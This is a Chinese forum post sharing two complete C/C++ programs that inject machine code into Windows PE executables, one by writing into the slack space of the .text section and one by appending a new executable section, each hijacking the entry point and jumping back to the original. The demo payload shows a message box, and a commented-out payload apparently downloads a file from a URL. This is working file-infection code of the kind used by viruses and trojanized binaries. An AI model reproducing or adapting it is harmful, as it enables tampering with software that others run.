HanDs
管理员

[Visual Studio文章] 俩种方式注入机器码 



PE插缝 和PE添节  

Pe插缝:

 
CODE:
//by 小浩 Q82602935
#include "stdafx.h"
#include <io.h>
#include <sys\stat.h>
#include <fcntl.h>
#include <stdio.h>



typedef struct tagPeInfo
{
        DWORD dwPeNewEntryAddress;
        DWORD dwPeOldEntryAddress;
        DWORD dwPePhysicalSize;
        DWORD dwPePhysicalAddress;
        DWORD dwPeVirtualSize;
        DWORD dwPeAddress;
        DWORD dwPegapsize;
        DWORD dwPeCodeoffset;
        DWORD dwPeEntryoffset;
}PeInfo,*PPeInfo;


typedef struct PE_HEADER_MAP
{
        DWORD Signature;
        IMAGE_FILE_HEADER _head;
        IMAGE_OPTIONAL_HEADER opt_head;
        IMAGE_SECTION_HEADER section_header[6];
}peHeader;



/*unsigned char szHexCode[] = {0x6A ,0x40 ,0xE8 ,0x15 ,0x00 ,0x00 ,0x00 ,0xCE ,0xDE ,0xCC,
0xF5 ,0xBC ,0xFE ,0xCE ,0xAA ,0xC4 ,0xE3 ,0xA3 ,0xAC ,0xBB,
0xB6 ,0xD3 ,0xAD ,0xC4 ,0xFA ,0xA3 ,0xA1 ,0x00 ,0xE8 ,0x06 ,
0x00 ,0x00 ,0x00 ,0x68 ,0x65 ,0x6C ,0x6C ,0x6F ,0x00 ,0x6A ,
0x00 ,0xB8 ,0x8A ,0x05 ,0xD5 ,0x77 ,0xFF ,0xD0 ,0xe9 ,0x00 ,
                                                                 0x00 ,0x00 ,0x00 };
*/
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};

/*
/*unsigned char szHexCode[]={
0x8B,0xF4,0x68,0x30,0xF0,0x41,0x00,0xFF,0x15,0x3C,
0x41,0x42,0x00,0x3B,0xF4,0xE8,0xA4,0x00,0x00,0x00,
0x89,0x45,0xFC,0x8B,0xF4,0x68,0x1C,0xF0,0x41,0x00,
0x8B,0x45,0xFC,0x50,0xFF,0x15,0x38,0x41,0x42,0x00,
0x3B,0xF4,0xE8,0x89,0x00,0x00,0x00,0x89,0x45,0xF8,
0x6A,0x00,0x6A,0x00,0xE8,0x07,0x00,0x00,0x00,0x63,
0x3A,0x5C,0x31,0x2E,0x67,0x00,0xE8,0x22,0x00,0x00,
0x00,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,
0x77,0x2E,0x62,0x61,0x69,0x64,0x75,0x2E,0x63,0x6F,
0x6D,0x2F,0x69,0x6D,0x67,0x2F,0x6C,0x6F,0x67,0x6F,
0x2E,0x67,0x69,0x66,0x00,0x6A,0x00,0xF8,0xFF,0xD0,
0xe9,0x00,0x00,0x00,0x00};
*/


int GetPeInfo(void *vBasepointer,PPeInfo Peinfo)
{
   IMAGE_DOS_HEADER *iDosHeader=(IMAGE_DOS_HEADER*)vBasepointer;
   if(iDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
   {
           MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
           return 0;
   }

   peHeader *pEheader=(peHeader*)((char*)iDosHeader+iDosHeader->e_lfanew);
   if(pEheader->Signature!=IMAGE_NT_SIGNATURE)
   {
           MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
           return 0;
   }

   char *szRet=strstr((const char*)pEheader->section_header[0].Name,".text");
   if(!szRet)
   {
           MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
           return 0;
   }
   
   Peinfo->dwPeAddress=iDosHeader->e_lfanew;
  
   Peinfo->dwPeVirtualSize=pEheader->section_header[0].Misc.VirtualSize;    //真实长度
   
   Peinfo->dwPePhysicalAddress=pEheader->section_header[0].PointerToRawData;   //物理偏移
  
   Peinfo->dwPePhysicalSize=pEheader->section_header[0].SizeOfRawData;     //物理长度

   Peinfo->dwPegapsize=Peinfo->dwPePhysicalSize
           -Peinfo->dwPeVirtualSize;                       //缝隙大小
  
   Peinfo->dwPeCodeoffset=pEheader->opt_head.BaseOfCode
           -Peinfo->dwPePhysicalAddress;                             //加载到内存中的代码段与文件中的代码段的差
  
   Peinfo->dwPeEntryoffset=pEheader->section_header[0].PointerToRawData
           +pEheader->section_header[0].Misc.VirtualSize;   //代码写入的物理偏移
   
   DWORD dwMods=Peinfo->dwPeEntryoffset%16;
   if(dwMods!=0)
   {
           Peinfo->dwPeEntryoffset+=(16-dwMods);
   }

   Peinfo->dwPeOldEntryAddress=pEheader->opt_head.AddressOfEntryPoint;  //OEP
   Peinfo->dwPeNewEntryAddress=Peinfo->dwPeEntryoffset+Peinfo->dwPeCodeoffset; //程序新入口地址
   return 1;
}

CString StrOfDWord(DWORD dwAddress)
{
        unsigned char waddress[4]={0};
       
        waddress[3]=(char)(dwAddress>>24)&0xFF;
        waddress[2]=(char)(dwAddress>>16)&0xFF;
        waddress[1]=(char)(dwAddress>>8 )&0xFF;
        waddress[0]=(char)(dwAddress    )&0xFF;
       
        return waddress;
}

int WriteCodeTofile(char szFilePath[],PPeInfo Peinfo)
{

   int nTolen=sizeof(szHexCode);
   

   DWORD dwRet;
   int nRet=_open(szFilePath,_O_RDWR | _O_CREAT | _O_BINARY,_S_IREAD | _S_IWRITE);
   if(!nRet)
   {
       MessageBox(NULL,"_open Error!","_open Error!",NULL);
       return 0;
   }
   
   dwRet=_lseek(nRet,(long)Peinfo->dwPeAddress+40,SEEK_SET);
   if(dwRet==-1)
   {
       MessageBox(NULL,"_lseek Error!","_lseek Error!",NULL);
       return 0;
   }

           char szWaddress[4]={0};
    memcpy(szWaddress,StrOfDWord(Peinfo->dwPeNewEntryAddress),4);
   
        dwRet=_write(nRet,szWaddress,4);
           if(dwRet==-1)
    {
                MessageBox(NULL,"_write Error!","_write Error!",NULL);
                return 0;
    }

/*        CString szMsgA;
        DWORD dwMessageBoxAadaddress;
           HINSTANCE gLibMsg=LoadLibrary("user32.dll");
        dwMessageBoxAadaddress=(DWORD)GetProcAddress(gLibMsg,"MessageBoxA");
           szMsgA=StrOfDWord(dwMessageBoxAadaddress);
*/
        CString szOepA;
        DWORD dwAddress;
        dwAddress = 0-(Peinfo->dwPeNewEntryAddress
                -Peinfo->dwPeOldEntryAddress+nTolen);
        szOepA=StrOfDWord(dwAddress);

        for(int i=0;i<4;i++)
        {
                szHexCode[32+i]=szOepA.GetAt(i);
        }

        dwRet=_lseek(nRet,(long)Peinfo->dwPeEntryoffset,SEEK_SET);
        if(dwRet==-1)
        {
                MessageBox(NULL,"_lseek Error!","_lseek Error!",NULL);
                return 0;
        }

        dwRet=_write(nRet,szHexCode,nTolen);
           if(dwRet==-1)
    {
                MessageBox(NULL,"_write Error!","_write Error!",NULL);
                return 0;
    }

        _close(nRet);
        return 1;
}


int InjectCodeToFile(char szFilePath[])
{
   HANDLE hFile=CreateFile(szFilePath,GENERIC_READ|GENERIC_WRITE,
           FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_FLAG_SEQUENTIAL_SCAN,0);
   if(hFile==INVALID_HANDLE_VALUE)
   {
           MessageBox(NULL,"CreateFile Error!","CreateFile Error!",NULL);
           return 0;
   }

   HANDLE hMapping=CreateFileMapping(hFile,0,PAGE_READONLY | SEC_COMMIT,0,0,0);
   if(!hMapping)
   {
           MessageBox(NULL,"CreateFileMapping Error!","CreateFileMapping Error!",NULL);
           return 0;
   }

   void *vBasepointer=MapViewOfFile(hMapping,FILE_MAP_READ,0,0,0);
   if(!vBasepointer)
   {
           MessageBox(NULL,"MapViewOfFile Error!","MapViewOfFile Error!",NULL);
           return 0;
   }

   CloseHandle(hFile);
   CloseHandle(hMapping);
   
   PeInfo pEinfo;
   int nRet=GetPeInfo(vBasepointer,&pEinfo);
   if(!nRet)
   return 0;
   UnmapViewOfFile(vBasepointer);
   
   if(pEinfo.dwPegapsize<sizeof(szHexCode))
   {
           MessageBox(NULL,"No room to write the data!","No room to write the data!",NULL);
           return 0;
   }

   WriteCodeTofile(szFilePath,&pEinfo);

   return 1;
}



void main()
{
        char szFilePath[MAX_PATH];
        printf("Please Input File Path:");
        scanf("%s",&szFilePath);

        char szFileBak[MAX_PATH];
        lstrcpy(szFileBak,szFilePath);
    lstrcat(szFileBak,".bak");
        CopyFile(szFilePath,szFileBak,FALSE);



        InjectCodeToFile(szFilePath);
}

PE添节:

[Copy to clipboard] [ - ]
CODE:
//转载请注明 By 小浩  QQ:82602935
#include <afx.h>
#include <stdio.h>
#include <assert.h>


unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
    0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};


CString StrOfDWord(DWORD dwAddress)
{
        unsigned char waddress[4]={0};
       
        waddress[3]=(char)(dwAddress>>24)&0xFF;
        waddress[2]=(char)(dwAddress>>16)&0xFF;
        waddress[1]=(char)(dwAddress>>8 )&0xFF;
        waddress[0]=(char)(dwAddress    )&0xFF;
       
        return waddress;
}


int Align(int size, int ALIGN_BASE)
{
        int ret;
        int result;
       
        assert( 0 != ALIGN_BASE );
       
        result = size % ALIGN_BASE;
        if (0 != result)         
        {
                ret = ((size / ALIGN_BASE) + 1) * ALIGN_BASE;
        }
        else
        {
                ret = size;
        }
       
        return ret;
}

void main()
{
        char szFilePath[MAX_PATH]={0};
        printf("Please Input FilePath:");
        scanf("%s",&szFilePath);
       
        char szFilaBak[MAX_PATH]={0};
        lstrcpy(szFilaBak,szFilePath);
        lstrcat(szFilaBak,".bak");
    int nRet=CopyFile(szFilePath,szFilaBak,FALSE);
    if(!nRet)
        {
                printf("CopyFile Error!\r\n");
                return;
        }

        FILE *pFile;
        pFile=fopen(szFilePath,"rb+");
        if(pFile==NULL)
        {
                printf("fopen Error!\r\n");
                return;
        }
        fseek(pFile,0,SEEK_SET);

    IMAGE_DOS_HEADER iMageDosHeader;
        fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
    if(iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
        {
                printf("Unknown type of file!\r\n");
                return;
        }
        fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);

        IMAGE_NT_HEADERS iMageNtHeaders;
        fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
        if(iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)
        {
                printf("Unknown type of file!\r\n");
                return;
        }

        int nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
    printf("%d Segment\r\n",nNumOfSections);

        int nFileAlignMent,nSectionAlignMent;
        nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
        nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
    printf("File Align Ment:%x\r\n",nFileAlignMent);
    printf("Section Align Ment:%x\r\n",nSectionAlignMent);

        DWORD dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
    printf("File OEP:%08x\r\n",dwOldOEP);

        IMAGE_SECTION_HEADER iMageSectionHeader;
        for(int i=0;i<nNumOfSections;i++)
        {
                fread(&iMageSectionHeader,sizeof(IMAGE_SECTION_HEADER),1,pFile);
                printf("Segment name:%s\r\n",iMageSectionHeader.Name);
        }

        IMAGE_SECTION_HEADER iMageNewSection;
        memset(&iMageNewSection,0,sizeof(IMAGE_SECTION_HEADER));

        strncpy((char*)iMageNewSection.Name,".x4h",strlen(".x4h"));
    iMageNewSection.VirtualAddress=Align(iMageSectionHeader.VirtualAddress
                +iMageSectionHeader.Misc.VirtualSize,nSectionAlignMent);

        int extraLengthAfterAlign=Align(30,nFileAlignMent);

        iMageNewSection.Misc.VirtualSize=Align(extraLengthAfterAlign,nSectionAlignMent);

        iMageNewSection.PointerToRawData=Align(iMageSectionHeader.PointerToRawData
                +iMageSectionHeader.SizeOfRawData,nFileAlignMent);

        iMageNewSection.SizeOfRawData=Align(0x1000,nFileAlignMent);

        iMageNewSection.Characteristics=0xE0000020;
       
           iMageNtHeaders.FileHeader.NumberOfSections++;

        iMageNtHeaders.OptionalHeader.SizeOfCode=Align(iMageNtHeaders.OptionalHeader.SizeOfCode
                +0x1000,nFileAlignMent);

        iMageNtHeaders.OptionalHeader.SizeOfImage=iMageNtHeaders.OptionalHeader.SizeOfImage
                +Align(0x1000,nSectionAlignMent);

        iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
        iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
        iMageNtHeaders.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress;

        fseek(pFile,0,SEEK_END);
        fseek(pFile,iMageDosHeader.e_lfanew+sizeof(IMAGE_NT_HEADERS)
                +nNumOfSections*sizeof(IMAGE_SECTION_HEADER),SEEK_SET);
    fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,pFile);

        fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
        fwrite(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
   
        fseek(pFile,0,SEEK_END);
       
        CString szOepA;
        DWORD dwAddress;
        dwAddress = 0-(iMageNewSection.VirtualAddress-dwOldOEP+sizeof(szHexCode));
        szOepA=StrOfDWord(dwAddress);
        for(i=0;i<4;i++)
        {
            szHexCode[32+i]=szOepA.GetAt(i);
        }

        for (i=0; i<Align(0x1000,nFileAlignMent);i++)
        {
                fputc(0,pFile);
        }
        fseek(pFile,iMageNewSection.PointerToRawData,SEEK_SET);
        for (i=0; i<sizeof(szHexCode);i++)
        {
                fputc(szHexCode[i],pFile);
        }
        fclose(pFile);



}


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
方式 注入 机器
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复